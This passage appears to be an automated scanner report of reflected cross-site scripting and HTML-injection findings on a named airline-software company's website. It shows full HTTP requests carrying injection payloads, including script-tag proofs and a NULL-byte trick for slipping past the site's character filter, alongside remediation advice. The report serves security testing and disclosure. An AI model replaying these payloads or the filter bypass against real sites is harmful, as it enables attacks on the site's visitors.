GET /home/includes/form_demo?iframe=true&width=5007ab88"><a>1c96e65d21&height=500 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airports Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322632; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A44%3A%22%2Fproducts_services%2Fgds_electronic_ticketing%2F%22%3B%7D;
The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f646a"><a>cdfa7ce7308 was submitted in the height parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home/includes/form_issues?issue=irregular_operations&iframe=true&width=500&height=500f646a"><a>cdfa7ce7308 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
The value of the iframe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6401"><a>928de2f5074 was submitted in the iframe parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home/includes/form_issues?issue=fuel_management&iframe=truef6401"><a>928de2f5074&width=500&height=500 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues/fuel_management Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322566; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
The value of the issue request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19ad6"><a>c3d3c691540 was submitted in the issue parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home/includes/form_issues?issue=irregular_operations19ad6"><a>c3d3c691540&iframe=true&width=500&height=500 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <input type="hidden" name="page" value="/home/includes/form_issues?issue=irregular_operations19ad6"><a>c3d3c691540&iframe=true&width=500&height=500" /> ...[SNIP]...
3.92. http://www.sabreairlinesolutions.com/home/includes/form_issues [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sabreairlinesolutions.com
Path:
/home/includes/form_issues
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002ecc8"><script>alert(1)</script>79c91da2525 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ecc8"><script>alert(1)</script>79c91da2525 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/includes/form_issues?issue=irregular_operations&iframe=true&width=500&height=500&%002ecc8"><script>alert(1)</script>79c91da2525=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues/irregular_operations Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322568; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3eca"><a>778f54e83ba was submitted in the width parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home/includes/form_issues?issue=fuel_management&iframe=true&width=500b3eca"><a>778f54e83ba&height=500 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/business_issues/fuel_management Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322566; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Faircentre_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3B%7D;
The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3ec7"><a>1395fc53d3 was submitted in the height parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home/includes/form_suites?suite=enterprise_operations&iframe=true&width=500&height=500a3ec7"><a>1395fc53d3 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;
The value of the iframe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a81e8"><a>c3993814117 was submitted in the iframe parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home/includes/form_suites?suite=enterprise_operations&iframe=truea81e8"><a>c3993814117&width=500&height=500 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <input type="hidden" name="page" value="/home/includes/form_suites?suite=enterprise_operations&iframe=truea81e8"><a>c3993814117&width=500&height=500" /> ...[SNIP]...
3.96. http://www.sabreairlinesolutions.com/home/includes/form_suites [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sabreairlinesolutions.com
Path:
/home/includes/form_suites
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002f18b"><script>alert(1)</script>589c7a48f61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2f18b"><script>alert(1)</script>589c7a48f61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/includes/form_suites?suite=enterprise_operations&iframe=true&width=500&height=500&%002f18b"><script>alert(1)</script>589c7a48f61=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;
The value of the suite request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8748e"><a>3f2efd2f839 was submitted in the suite parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home/includes/form_suites?suite=enterprise_operations8748e"><a>3f2efd2f839&iframe=true&width=500&height=500 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;
The value of the width request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22f32"><a>5557ac528ce was submitted in the width parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /home/includes/form_suites?suite=enterprise_operations&iframe=true&width=50022f32"><a>5557ac528ce&height=500 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323053; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A2%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;
The value of the %0048092<a>12e2bef5c79 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 633a2"><a>735ea7d59b4 was submitted in the %0048092<a>12e2bef5c79 parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>12e2bef5c79=1633a2"><a>735ea7d59b4"> ...[SNIP]...
3.100. http://www.sabreairlinesolutions.com/home/news_events [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/news_events
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0016d00"><a>26e1511d709 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 16d00"><a>26e1511d709 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events?%0016d00"><a>26e1511d709=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/news_events?%0016d00"><a>26e1511d709=1"> ...[SNIP]...
3.101. http://www.sabreairlinesolutions.com/home/news_events/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/news_events/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a5f95"><a>5ba92138525 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5f95"><a>5ba92138525 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/?%00a5f95"><a>5ba92138525=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321219; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproducts_services%2Fproduct%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/home/news_events/?%00a5f95"><a>5ba92138525=1"> ...[SNIP]...
3.102. http://www.sabreairlinesolutions.com/home/news_events/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/news_events/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00c3bac<a>1d963d7e0b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c3bac<a>1d963d7e0b4 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/?%00c3bac<a>1d963d7e0b4=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321219; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproducts_services%2Fproduct%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A2%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a>1d963d7e0b4=1">?%00c3bac<a>1d963d7e0b4=1</a> ...[SNIP]...
3.103. http://www.sabreairlinesolutions.com/home/news_events/event/2009_sabresonic_loyalty_user_conference [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %001da3b<a>f5b12036d1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1da3b<a>f5b12036d1a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/news_events/event/2009_sabresonic_loyalty_user_conference?%001da3b<a>f5b12036d1a=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/news_events/events/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322311; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Fother_airline_issues%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_manager%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a>f5b12036d1a=1">2009 sabresonic loyalty user conference?%001da3b<a>f5b12036d1a=1</a> ...[SNIP]...
3.104. http://www.sabreairlinesolutions.com/home/news_events/event/2009_sabresonic_loyalty_user_conference [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0071aa9"><a>a46e784cedb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71aa9"><a>a46e784cedb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
